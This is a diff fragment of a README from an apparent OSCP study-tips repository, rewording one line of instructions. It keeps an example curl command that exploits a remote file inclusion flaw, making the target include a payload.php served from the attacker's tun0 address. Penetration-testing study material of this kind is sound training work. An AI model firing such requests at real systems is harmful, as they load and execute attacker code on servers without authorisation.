0xceba/oscp_tips/README.md

 	```
 	source ~/.bashrc
 	```
-	Example: use the following to exploit an RFI vulnerability (the unicorns of web application hacking):
+	Example: use these variables to exploit an RFI vulnerability (the unicorns of web application hacking):
 	```
 	curl "http://$targ/vuln_page.php?file=http://$tun0:8888/payload.php"
 	```